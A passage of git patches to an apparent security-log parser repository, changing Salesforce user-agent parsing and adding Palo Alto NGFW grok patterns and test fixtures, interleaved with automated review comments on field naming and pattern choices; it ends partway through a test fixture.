"{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" @@ -41,7 +41,7 @@ }, "session": { "key": { - "id": "E6btf+6MZDOBIAEF" + "id": "session-key12323" } }, "user": { 
From 0b6ea3a3378799d0028d2b7d16e3085c2dde2799 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 16:10:27 +0200 Subject: [PATCH 200/317] Change salesforce user_agent --- Salesforce/salesforce-events/_meta/fields.yml | 5 +++++ Salesforce/salesforce-events/ingest/parser.yml | 2 +- .../tests/salesforce_apex_rest_api.json | 17 ++++------------- .../tests/salesforce_complete_event_1.json | 13 +++---------- 4 files changed, 13 insertions(+), 24 deletions(-) diff --git a/Salesforce/salesforce-events/_meta/fields.yml b/Salesforce/salesforce-events/_meta/fields.yml index ec92923ea..29be61136 100644 --- a/Salesforce/salesforce-events/_meta/fields.yml +++ b/Salesforce/salesforce-events/_meta/fields.yml @@ -117,3 +117,8 @@ salesforce.user.type: description: Salesforce user type name: salesforce.user.type type: keyword + +salesforce.user_agent: + description: Salesforce user agent + name: salesforce.user_agent + type: number diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml index 7a3452fa9..01b66855f 100644 --- a/Salesforce/salesforce-events/ingest/parser.yml +++ b/Salesforce/salesforce-events/ingest/parser.yml @@ -72,7 +72,7 @@ stages: filter: "{{json_event.output.BROWSER_TYPE != None}}" - set: - user_agent.original: "{{json_event.output.USER_AGENT}}" + salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}" filter: "{{json_event.output.USER_AGENT != None}}" set_source_ip: diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index c6a4ab44a..2250f3670 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json 
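Review bot: `salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}"` in the parser.yml hunk emits 0 for any USER_AGENT value that is not an integer instead of leaving the field unset, so a real code of 0 and an unparseable value become indistinguishable; the salesforce_complete_event_1 fixture in this same commit shows exactly that, going from `"original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) …"` to `"user_agent": 0`, presumably the `int` filter's fallback. With `user_agent.original` removed, the raw string is no longer kept anywhere on the event either. I would tighten the filter so the numeric mapping only fires for digit-only values (test the string before applying `| int`) and keep the old `user_agent.original: "{{json_event.output.USER_AGENT}}"` set for the remaining cases, so the original value stays available for triage and detection. The `stages` block this `set` belongs to starts outside the hunk.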
@@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": 
"{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" @@ -46,7 +46,8 @@ }, "user": { "type": "Standard" - } + }, + "user_agent": 12024001 }, "source": { "address": "1.2.3.4", 
@@ -57,16 +58,6 @@ }, "user": { "id": "user123123123123" - }, - "user_agent": { - "device": { - "name": "Other" - }, - "name": "Other", - "original": "9999", - "os": { - "name": "Other" - } } } } \ No newline at end of file diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json index bc1c801cf..051638d22 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json @@ -100,7 +100,8 @@ "user": { "initiated_logout": true, "type": "admin" - } + }, + "user_agent": 0 }, "source": { "address": "1.2.3.4", @@ -117,16 +118,8 @@ "id": "00530000009M943" }, "user_agent": { - "device": { - "name": "Other" - }, "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", - "os": { - "name": "Windows", - "version": "10" - }, - "version": "93.0.4577" + "version": "93.0.4577.82" } } } \ No newline at end of file From ab6c2fa267e5098698435037d4609a1e83dde638 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Wed, 6 Nov 2024 15:36:23 +0100 Subject: [PATCH 201/317] Add some additional groks --- .../paloalto-ngfw/_meta/fields.yml | 15 ++++ .../paloalto-ngfw/ingest/parser.yml | 24 +++++- .../paloalto-ngfw/tests/system_csv.json | 9 ++- .../tests/test_event_reason.json | 51 +++++++++++++ .../tests/test_event_reason1.json | 61 +++++++++++++++ .../tests/test_event_reason2.json | 74 +++++++++++++++++++ .../tests/test_event_reason3.json | 74 +++++++++++++++++++ 7 files changed, 305 insertions(+), 3 deletions(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index 7c526334c..3f149e4a5 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -307,3 +307,18 @@ paloalto.threat.type: description: The type of the threat name: paloalto.threat.type type: keyword + +paloalto.vsys: + description: The virtual system + name: paloalto.vsys + type: keyword + +paloalto.authetification.profile: + description: The authentication profile + name: paloalto.authetification.profile + type: keyword + +paloalto.server.profile: + description: The server profile + name: paloalto.server.profile + type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index bf144527c..d09e6e308 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
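Review bot: The new field name `paloalto.authetification.profile` in the fields.yml hunk is misspelled, and it sits next to the existing `paloalto.authentication.method` key in the same file (visible as context in the later "Apply linter" hunk), so the two authentication attributes land under different prefixes and any search or dashboard grouping on `paloalto.authentication.*` will miss the profile. I would declare it as `paloalto.authentication.profile:` with `name: paloalto.authentication.profile` before it ships; the same spelling is used in the parser.yml `@@ -732,6 +749,9 @@` hunk and in the expected output of system_csv.json, test_event_reason2.json and test_event_reason3.json, which would all need the same rename. If the misspelled name has already been published to consumers, renaming becomes a schema change and would need a deprecation note instead.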
@@ -438,7 +438,7 @@ pipeline: properties: raise_errors: false input_field: "{{parsed_event.message.EventDescription}}" - pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}" + pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}|%{REASON1}|%{REASON2}|%{REASON3}|%{REASON4}|%{REASON5}" custom_patterns: SYSTEM_AUTH_AUTHENTICATION_FOR: "authenticated for user '%{USERNAME:user}'. auth profile '%{DATA:auth_profile}', vsys '%{DATA:vsys}', server profile '%{DATA:server_profile}', server address '%{HOSTNAME:server_address}', From: %{IP:src}." CONNECTION: "%{CONNECTION_SUCCESS}|%{CONNECTION_TO_SERVER}|%{CONNECTION_REGISTERED}" @@ -463,6 +463,11 @@ pipeline: AUTHENTICATION: "%{AUTHENTICATION_CONSOLE}|%{AUTHENTICATION_WEB}" AUTHENTICATION_CONSOLE: "authenticated for user '%{USERNAME:user}'. From: %{IP:src}." AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}" + REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}' + REASON2: 'ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}' + REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}" + REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, 
From: %{IP:source_ip}" + REASON5: 'authenticated for user %{WORD:user}\. auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.' filter: '{{parsed_event.message.get("EventDescription") != None}}' - name: parsed_threat @@ -535,6 +540,10 @@ stages: destination.ip: "{{parsed_description.message.dst}}" filter: "{{parsed_description.message.dst | is_ipaddress}}" + - set: + destination.ip: "{{parsed_description.message.destination_ip}}" + filter: "{{parsed_description.message.destination_ip | is_ipaddress}}" + - set: destination.nat.ip: "{{parsed_event.message.destinationTranslatedAddress}}" filter: "{{parsed_event.message.destinationTranslatedAddress | is_ipaddress}}" @@ -567,6 +576,10 @@ stages: event.code: "{{ parsed_threat.message.threat_code }}" filter: "{{ parsed_threat.get('message') != None }}" + - set: + event.reason: "{{ parsed_description.message.reason }}" + filter: "{{ parsed_description.message.get('reason') != None }}" + - set: destination.port: "{{parsed_event.message.DestinationPort or parsed_event.message.dpt or parsed_description.message.dport}}" destination.user.name: "{{parsed_event.message.duser or parsed_event.message.DestinationUser}}" 
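Review bot: REASON3, REASON4 and REASON5 in the `custom_patterns` hunk capture the account with `%{WORD:user}`, while the sibling SYSTEM_AUTH_AUTHENTICATION_FOR pattern in the same map uses `%{USERNAME:user}`. WORD does not accept `.` or `-`, which USERNAME does, so a message for a user such as `j.doe` fails the whole alternative and the event silently loses its user, source and destination extraction because the stage runs with `raise_errors: false`. I would switch the three captures to `%{USERNAME:user}` to match the existing pattern and add a fixture with a dotted user name. The `custom_patterns` map and the grok stage it belongs to start outside the hunk.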
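Review bot: The new `event.reason: "{{ parsed_description.message.reason }}"` set in the `@@ -567,6 +576,10 @@` hunk can only be fed by REASON4's `%{GREEDYDATA:reason}` (the failed-authentication message), and none of the four fixtures added in this commit contains a failed-authentication description, so this branch is unexercised. The fixtures also show `event.reason` already populated with the full EventDescription by an assignment outside the hunk, so for a REASON4 event this set would presumably narrow it to the text after `Reason:`; whether that is intended depends on stage order, which is not visible here. A fixture built from a "failed authentication for user …" message would pin the behaviour either way.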
@@ -578,7 +591,7 @@ stages: event.dataset: "{{parsed_event.message.DeviceEventClassID|lower or parsed_event.message.Type|lower or parsed_event.message.LogType|lower}}" event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" - host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}" + host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}" host.id: "{{parsed_event.message.deviceExternalId}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" @@ -673,6 +686,10 @@ stages: source.ip: "{{parsed_description.message.src}}" filter: "{{parsed_description.message.src | is_ipaddress}}" + - set: + source.ip: "{{parsed_description.message.source_ip}}" + filter: "{{parsed_description.message.source_ip | is_ipaddress}}" + - set: source.nat.ip: "{{parsed_event.message.NATSource}}" filter: "{{parsed_event.message.NATSource | is_ipaddress}}" 
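Review bot: The `host.name` fallback to `parsed_description.message.hostname` in the `@@ -578,7 +591,7 @@` hunk is only produced by REASON1, where the captured name is the monitored User-ID server rather than the firewall: test_event_reason.json ends up with `host.name: test05` while the same event carries `FFFFF01` in `log.hostname` and `observer.name`. Every other candidate in that `or` chain names the reporting device, so a detection or pivot keyed on host.name would now point at the monitored server for this one event type. Mapping the capture to a field that describes the remote side, something like `destination.domain` or a dedicated `paloalto.*` key, looks like the safer choice; if the fallback is kept on purpose, a short comment above the line explaining why would help the next maintainer. The surrounding `set` block starts and ends outside the hunk.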
@@ -732,6 +749,9 @@ stages: paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}" paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}" paloalto.threat.name: "{{parsed_threat.message.threat_description}}" + paloalto.vsys: "{{parsed_description.message.vsys}}" + paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}" + paloalto.server.profile: "{{parsed_description.message.server_profile}}" - set: paloalto.threat.type: > {%- set id = parsed_threat.message.threat_code | int -%} diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json index 3e52f494c..70c22f924 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json @@ -35,7 +35,14 @@ "DGHierarchyLevel3": "0", "DGHierarchyLevel4": "0", "EventID": "auth-success", - "Threat_ContentType": "auth" + "Threat_ContentType": "auth", + "authetification": { + "profile": "GP" + }, + "server": { + "profile": "LDAP" + }, + "vsys": "vsys123" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json new file mode 100644 index 000000000..d0c6195a9 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json 
@@ -0,0 +1,51 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + }, + "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00" + }, + "expected": { + "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "reason": "User-ID server monitor test05(vsystest) Access denied", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-25T14:04:52.574000Z", + "action": { + "name": "connect-server-monitor-failure", + "type": "userid" + }, + "host": { + "name": "test05" + }, + "log": { + "hostname": "FFFFF01", + "level": "high", + "logger": "system" + }, + "observer": { + "name": "FFFFF01", + "product": "PAN-OS", + "serial_number": "024101011111" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "connect-server-monitor-failure", + "Threat_ContentType": "userid", + "vsys": "vsystest" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json new file mode 100644 index 000000000..105b28d45 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json 
@@ -0,0 +1,61 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + }, + "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00" + }, + "expected": { + "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "reason": "ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-25T14:10:48.575000Z", + "action": { + "name": "connect-ldap-sever", + "type": "userid" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "log": { + "hostname": "FFFFFF01", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "FFFFFF01", + "product": "PAN-OS", + "serial_number": "024101010000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "connect-ldap-sever", + "Threat_ContentType": "userid" + }, + "related": { + "ip": [ + "0.0.1.1", + "5.6.7.8" + ] + }, + "source": { + "address": "0.0.1.1", + "ip": "0.0.1.1" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json new file mode 100644 index 000000000..65221596d --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + }, + "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0" + }, + "expected": { + "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. 
Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8", + "type": [ + "start" + ] + }, + "@timestamp": "2024-10-22T06:54:17.012000Z", + "action": { + "name": "auth-success", + "type": "auth" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "log": { + "hostname": "FWPAN01", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "FWPAN01", + "product": "PAN-OS", + "serial_number": "024101011111" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", + "Threat_ContentType": "auth", + "authetification": { + "profile": "FFFF" + }, + "server": { + "profile": "SERVER_TEST" + }, + "vsys": "shared" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "joe1595" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "joe1595" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json new file mode 100644 index 000000000..8f64d342d --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json @@ -0,0 +1,74 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + }, + "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979. auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, 
From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00" + }, + "expected": { + "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979. auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "authenticated for user joe979. auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-10-22T07:29:30.605000Z", + "action": { + "name": "auth-success", + "type": "auth" + }, + "destination": { + "address": "1.7.4.4", + 